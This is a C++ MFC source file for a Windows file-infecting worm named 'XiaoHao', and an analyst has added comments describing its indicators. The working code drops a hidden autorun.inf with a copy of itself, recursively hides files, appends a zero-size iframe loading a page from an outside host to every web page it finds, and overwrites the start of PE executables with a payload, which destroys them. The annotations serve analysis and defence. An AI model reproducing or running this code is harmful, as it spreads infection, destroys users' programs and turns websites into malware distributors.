// WormBegin.cpp : implementation file
//
#include "stdafx.h"
#include "XiaoHao.h"
#include "WormBegin.h"
#include "YouHua.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/////////////////////////////////////////////////////////////////////////////
// CWormBegin
// MFC runtime-class registration: lets the framework create CWormBegin dynamically
// as a CView-derived class.
// NOTE(analysis): despite being a "view", the class carries the file-infection
// routines defined further down in this file (GRDirctory, BeginFind, GRexe, ...).
IMPLEMENT_DYNCREATE(CWormBegin, CView)
// Default constructor. Performs no initialisation of its own; members such as
// MyFileName and VirusPath (assigned in GRDirctory / BeginFind) are not set here.
CWormBegin::CWormBegin()
{
}
// Destructor. Empty: nothing is released here.
CWormBegin::~CWormBegin()
{
}
// Message map for CWormBegin. It is empty: no window messages are routed to this
// class, so the routines under "message handlers" below are ordinary member
// functions that must be called explicitly from elsewhere in the project.
BEGIN_MESSAGE_MAP(CWormBegin, CView)
//{{AFX_MSG_MAP(CWormBegin)
// NOTE - the ClassWizard will add and remove mapping macros here.
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CWormBegin drawing
// Paint callback required by CView. This is an unfilled wizard stub: the
// document pointer is fetched but nothing is drawn.
void CWormBegin::OnDraw(CDC* pDC)
{
CDocument* const pDocument = GetDocument();
// TODO: add draw code here
static_cast<void>(pDC);
static_cast<void>(pDocument);
}
/////////////////////////////////////////////////////////////////////////////
// CWormBegin diagnostics
#ifdef _DEBUG
// Debug-only validity check; simply forwards to the CView implementation.
void CWormBegin::AssertValid() const
{
CView::AssertValid();
}
// Debug-only state dump; simply forwards to the CView implementation.
void CWormBegin::Dump(CDumpContext& dc) const
{
CView::Dump(dc);
}
#endif //_DEBUG
/////////////////////////////////////////////////////////////////////////////
// CWormBegin message handlers
// ANALYSIS NOTE - AutoRun propagation routine.
// Drops two files into the directory given by Path:
//   <Path>autorun.inf  - an [Autorun] section whose open=, shellexecute= and
//                        shell\Auto\command= entries all name Xiaohao.exe
//   <Path>Xiaohao.exe  - a copy of the currently running executable
// and then marks both as hidden.
//
// Path is concatenated without adding a separator, so it presumably arrives with
// a trailing backslash (e.g. a drive root) - confirm against the caller.
// Returns FALSE if autorun.inf cannot be opened or the copy fails, TRUE otherwise.
//
// Defender view: a hidden autorun.inf next to a hidden Xiaohao.exe at the root of
// a volume is the on-disk indicator left by this routine; systems with AutoRun
// disabled for the drive type do not act on the dropped autorun.inf.
BOOL CWormBegin::GRDirctory(CString Path)
{
// Full path of the running module. The buffer is 256 bytes, so a longer path
// would be truncated by GetModuleFileName; the return value is not checked.
char ff[256];
GetModuleFileName(NULL,ff,sizeof(ff));
// MyFileName is not declared in this block; presumably a class member.
MyFileName=ff;
CString Data,AutoFile,PathName;
// Contents of the autorun.inf that will be written.
Data="[Autorun]\r\n";
Data+="open=Xiaohao.exe\r\n";
Data+="shellexecute=Xiaohao.exe\r\n";
Data+="shell\\Auto\\command=Xiaohao.exe\r\n";
AutoFile=Path;
AutoFile+="autorun.inf";
PathName=Path;
PathName+="Xiaohao.exe";
CStdioFile Auto;
// modeCreate|modeNoTruncate: create the file if absent, keep existing contents
// otherwise. No seek follows, so the data is written from the initial file position.
if(!Auto.Open(AutoFile,CFile::modeNoTruncate|CFile::modeWrite|CFile::modeCreate))
return FALSE;
Auto.WriteString(Data);
Auto.Close();
// Third argument 0 (bFailIfExists = FALSE): an existing Xiaohao.exe is overwritten.
// If the copy fails, the autorun.inf written above is left behind, not hidden.
if(!CopyFile(MyFileName,PathName,0))
{
return FALSE;
}
else
{
SetFileAttributes(PathName,FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes(AutoFile,FILE_ATTRIBUTE_HIDDEN);
return TRUE;
}
// Unreachable: both branches above return.
return TRUE;
}
// ANALYSIS NOTE - recursive directory walker that drives the infection.
// For every regular file below Dir it looks at the text after the last '.' in
// the file name (case-sensitive comparison) and:
//   htm/html/asp/aspx/php/jsp : logs the path (Jilu), resets attributes to NORMAL
//                               and appends the iframe via GanRanWeb
//   exe                       : skips four hard-coded names, resets attributes to
//                               NORMAL and calls GRexe; on success logs the path
//                               and sleeps 100 ms
//   anything that is not exe  : retitles the current foreground window and marks
//                               the file HIDDEN
// The "exe" test is a separate if/else, so the web files handled by the first
// branch also fall into the final else and end up hidden.
//
// Defender view: observable effects are bulk attribute changes (files becoming
// hidden), a changed foreground-window title, modified web pages/executables,
// and the growing log written by Jilu.
void CWormBegin::BeginFind(CString Dir)
{
//-------------------------------------------------------------
// Build "<system directory>\exloroe.exe" and store it in VirusPath (not declared
// in this block; presumably a class member). GRexe reads the file at that path.
// This is recomputed on every call, including each recursive one.
char SystemDirectory[MAX_PATH];
GetSystemDirectory(SystemDirectory,MAX_PATH);
CString m_systemdirectory;
m_systemdirectory.Format("%s",SystemDirectory);
m_systemdirectory+="\\exloroe.exe";
VirusPath=m_systemdirectory;
//---------------------------------------------------------------
CString FileName;
CFileFind Fuck;
// Search pattern: "<Dir>\*.*", adding the backslash only when it is missing.
CString DirectoryName=Dir;
if(DirectoryName.Right(1)!="\\")
DirectoryName+="\\";
DirectoryName+="*.*";
BOOL Res = Fuck.FindFile(DirectoryName);
while(Res)
{
// FindNextFile advances to the next entry; its result is the loop condition.
Res=Fuck.FindNextFile();
if(Fuck.IsDirectory() && !Fuck.IsDots())
{
// Descend into sub-directories; there is no depth limit.
BeginFind(Fuck.GetFilePath());
}
else if(!Fuck.IsDirectory() && !Fuck.IsDots())
{
CString strPath;
strPath.Format("%s",Fuck.GetFilePath());
FileName.Format("%s",Fuck.GetFileName());
// Keep only the text after the last '.'; from here on FileName is the extension.
FileName=FileName.Mid(FileName.ReverseFind('.')+1);
if(FileName=="htm" || FileName=="html" || FileName=="asp" || FileName=="aspx" || FileName=="php" || FileName=="jsp")
{
Jilu(strPath);
// Replaces the file's attributes with NORMAL before it is opened for writing.
SetFileAttributes(strPath,FILE_ATTRIBUTE_NORMAL);
GanRanWeb(strPath);
}
if(FileName=="exe")
{
// Exclusion list: three spellings of the dropped copy's name plus config.exe.
if(Fuck.GetFileName()=="xiaohao.exe" || Fuck.GetFileName()=="XiaoHao.exe"
||Fuck.GetFileName()=="Xiaohao.exe"||Fuck.GetFileName()=="config.exe")
continue;
SetFileAttributes(strPath,FILE_ATTRIBUTE_NORMAL);
// GRexe returns 0 when the file was not modified; only modified files are logged.
if(!GRexe(strPath))
continue;
else
{
Jilu(strPath);
Sleep(100);
}
}
else
{
// Changes the title of whatever window is in the foreground at this moment
// (the literal starts with the Chinese for "infected"), then hides the file.
HWND hwnd=::GetForegroundWindow();
::SetWindowText(hwnd,"已中毒 X14o-H4o's Virus");
SetFileAttributes(strPath,FILE_ATTRIBUTE_HIDDEN);
}
}
}
Fuck.Close();
}
// ANALYSIS NOTE - activity log ("jilu" is presumably pinyin for "record").
// Appends ss followed by CRLF to c:\Jilu.txt, creating the file if needed, and
// marks the file hidden after each write.
//
// Returns 1 when the log cannot be opened. On the success path the function ends
// without a return statement, so its result is undefined there; the callers
// visible in this file ignore the return value.
//
// Defender view: a hidden c:\Jilu.txt is both an indicator and a forensic aid -
// BeginFind passes it the path of each web file it processes and each executable
// GRexe reports as modified, so it lists the files needing remediation.
int CWormBegin::Jilu(CString ss)
{
CString str1;
str1=ss;
str1+="\r\n";
CStdioFile file;
if(!file.Open("c:\\Jilu.txt",CFile::modeNoTruncate|CFile::modeWrite|CFile::modeCreate))
return 1;
// Existing contents are kept (modeNoTruncate); new entries go to the end.
file.SeekToEnd();
file.WriteString(str1);
file.Close();
SetFileAttributes("c:\\Jilu.txt",FILE_ATTRIBUTE_HIDDEN);
}
// ANALYSIS NOTE - web-page tampering routine.
// Appends a zero-width, zero-height <iframe> that loads
// http://xiaohao.yona.biz/xiaohao.htm to the end of the file FName.
// The file must already exist (no modeCreate); if it cannot be opened for
// writing the function returns silently.
// No check is made for an earlier injection, so each call appends the line again.
//
// Defender view: the appended iframe line is the indicator to search for in
// htm/html/asp/aspx/php/jsp content; because the text is only appended after
// the original content, removing that trailing line restores the page.
void CWormBegin::GanRanWeb(CString FName)
{
CString str1;
CString WriteBuf="\r\n<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>";
str1=FName;
CStdioFile file;
if(!file.Open(str1,CFile::modeNoTruncate|CFile::modeWrite))
return;
file.SeekToEnd();
file.WriteString(WriteBuf);
file.Close();
}
// Checks whether File_Name looks like a PE image: the DOS header must carry
// IMAGE_DOS_SIGNATURE and the header found at e_lfanew must carry
// IMAGE_NT_SIGNATURE.
// Returns 1 for a PE file; 0 if the file cannot be opened or either signature
// does not match.
//
// NOTE(review): the fread results are never checked and e_lfanew is taken from
// the file as-is, so on short or malformed files the comparisons run on
// whatever the header structures happen to contain.
// NOTE(review): the file is opened "r+b" (read/write) although it is only read.
int CWormBegin::PD_PE(CString File_Name)
{
IMAGE_DOS_HEADER myDosHeader;
IMAGE_NT_HEADERS myNtHeader;
WORD e_magic;
FILE *pFile;
LONG e_lfanew;
DWORD Si;
if(!(pFile = fopen(File_Name,"r+b")))
return 0;
fread(&myDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);
e_lfanew=myDosHeader.e_lfanew; // save the file offset of the PE header
e_magic=myDosHeader.e_magic;
if(myDosHeader.e_magic!=IMAGE_DOS_SIGNATURE) // check whether this is an MS-DOS (MZ) file
{
// The fclose below is placed after the return and never runs, so pFile stays
// open on this path.
return 0;
fclose(pFile);
}
else
{
fseek(pFile,e_lfanew,SEEK_SET); // read starting at the PE header
fread(&myNtHeader,sizeof(IMAGE_NT_HEADERS),1,pFile);
Si=myNtHeader.Signature;
if(Si==IMAGE_NT_SIGNATURE)
{// signature is "PE\0\0"
fclose(pFile);
return 1;
}
else
{
fclose(pFile);
return 0;
}
}
// Unreachable: every branch above has already returned.
fclose(pFile);
return 1;
}
// ANALYSIS NOTE - executable infection routine.
// If m_name passes PD_PE, the whole file at VirusPath is read into memory and
// written over the beginning of m_name, after which a 4-byte marker taken from
// the CString "ygr" is appended to the end of m_name.
// A file whose trailing bytes already compare equal to "ygr" is left alone.
// Returns 1 when the target was modified; 0 if it is not a PE file, either file
// cannot be opened, or the marker is already present.
//
// Defender view: a modified file begins with the content of
// <system directory>\exloroe.exe (see BeginFind) and ends with the marker.
// The original leading bytes are overwritten in place and are not saved anywhere
// in this function, so the host program cannot be recovered from the modified
// file itself - restore affected executables from a known-good source.
int CWormBegin::GRexe(CString m_name)
{
int m_pd=PD_PE(m_name);
if(m_pd)
{
CString Biaoji="ygr";
char *Biaoji1=" ";
char *FileBuf;
DWORD FileLen=0;
DWORD FileLen1=0;
// s2 = payload source (VirusPath), s1 = target file; both opened read/write.
CFile s1;
CFile s2;
if(!s2.Open(VirusPath,CFile::modeReadWrite))
{
return 0;
}
if(!s1.Open(m_name,CFile::modeReadWrite))
{
return 0;
}
s2.SeekToBegin();
FileLen=s2.GetLength();
FileLen1=s1.GetLength();
// Offset of the last four bytes of the target, where the marker is expected.
FileLen1=FileLen1-4;
// FileBuf is never deleted in this function.
FileBuf=new char[FileLen+1];
FileBuf[FileLen]=0;
s2.Read(FileBuf,FileLen);
s1.Seek(FileLen1,CFile::begin);
// NOTE(review): sizeof(Biaoji1) is the size of a pointer, not of the 4-byte
// allocation; the two coincide only where pointers are 4 bytes wide.
// Biaoji1 is never deleted either.
Biaoji1=new char[4];
s1.Read(Biaoji1,sizeof(Biaoji1));
// Already marked: return without touching the file (s1/s2 are not closed
// explicitly on this path).
if(Biaoji1==Biaoji)
return 0;
// Overwrite the start of the target with the payload bytes...
s1.SeekToBegin();
s1.Write(FileBuf,FileLen);
// ...and append 4 bytes from the marker string at the end.
s1.SeekToEnd();
s1.Write(Biaoji,4);
s1.Close();
s2.Close();
return 1;
}
else
return 0;
}
呵呵....别运行哦..